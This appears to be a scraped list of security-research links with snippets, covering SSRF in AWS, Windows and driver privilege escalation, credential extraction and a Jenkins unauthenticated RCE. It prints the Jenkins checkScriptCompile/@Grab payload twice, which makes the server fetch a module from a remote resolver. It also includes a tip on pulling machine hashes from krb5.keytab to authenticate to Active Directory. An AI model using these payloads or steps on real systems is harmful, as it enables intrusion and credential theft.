Exploiting SSRF in AWS Elastic Beanstalk
https://www.notsosecure.com/exploiting-ssrf-in-aws-elastic-beanstalk/
https://www.notsosecure.com/exploiting-ssrf-in-aws-elastic-beanstalk/
NotSoSecure
Exploiting SSRF in AWS Elastic Beanstalk
In this blog, Sunil Yadav, our lead trainer for "Advanced Web Hacking " training class, will discuss a case study where a Server-Side Request Forgery (SSRF) vulnerability was identified and exploited
ActiveX Exploitation in 2019 :: Instantiation is not Scripting
https://srcincite.io/blog/2019/02/01/activex-exploitation-in-2018-instantiation-is-not-scripting.html
https://srcincite.io/blog/2019/02/01/activex-exploitation-in-2018-instantiation-is-not-scripting.html
Extracting hard-coded credentials using managed code debugging techniques in Windbg (2012)
http://www.exploit-monday.com/2012/05/extracting-hard-coded-credentials-using.html
http://www.exploit-monday.com/2012/05/extracting-hard-coded-credentials-using.html
Exploit-Monday
Extracting hard-coded credentials using managed code debugging techniques in Windbg
tl;dr version Using some simple managed code debugging techniques, you can easily pull out hard-coded credentials from a binary claiming t...
Windows Exploitation Tricks: Exploiting Arbitrary Object Directory Creation for Local Elevation of Privilege
https://googleprojectzero.blogspot.com/2018/08/windows-exploitation-tricks-exploiting.html
https://googleprojectzero.blogspot.com/2018/08/windows-exploitation-tricks-exploiting.html
Blogspot
Windows Exploitation Tricks: Exploiting Arbitrary Object Directory Creation for Local Elevation of Privilege
Posted by James Forshaw, Project Zero And we’re back again for another blog in my series on Windows Exploitation tricks. This time I’ll...
https://github.com/schutzwerk/CANalyzat0r
CANalyzat0r: A security analysis toolkit for proprietary car protocols
CANalyzat0r: A security analysis toolkit for proprietary car protocols
Got a root shell on a domain-joined Linux box? Stumbled on this PS script yesterday. Run this against /etc/krb5.keytab to extract the machine hash and authenticate to AD and run your favorite enum tools :)
https://gist.github.com/0xhexmex/2ac1dee8a13b86668cfa7b849c52b210
https://gist.github.com/0xhexmex/2ac1dee8a13b86668cfa7b849c52b210
Gist
Parses Kerberos Keytab files
Parses Kerberos Keytab files. GitHub Gist: instantly share code, notes, and snippets.
CVE-2019-8372: Local Privilege Elevation in LG Kernel Driver
http://www.jackson-t.ca/lg-driver-lpe.html
http://www.jackson-t.ca/lg-driver-lpe.html
Hacking Jenkins Part 2 - Abusing Meta Programming for Unauthenticated RCE!
https://blog.orange.tw/2019/02/abusing-meta-programming-for-unauthenticated-rce.html
https://blog.orange.tw/2019/02/abusing-meta-programming-for-unauthenticated-rce.html
Orange
Hacking Jenkins Part 2 - Abusing Meta Programming for Unauthenticated RCE!
This is 🍊 speaking
Jenkins Unauth RCE
/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile ?value=
@GrabConfig(disableChecksums=true)%0a
@GrabResolver(name='tld', root='http://[]/')%0a
@Grab(group='', module='poc', version='1')%0a
import rn;
/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile ?value=
@GrabConfig(disableChecksums=true)%0a
@GrabResolver(name='tld', root='http://[]/')%0a
@Grab(group='', module='poc', version='1')%0a
import rn;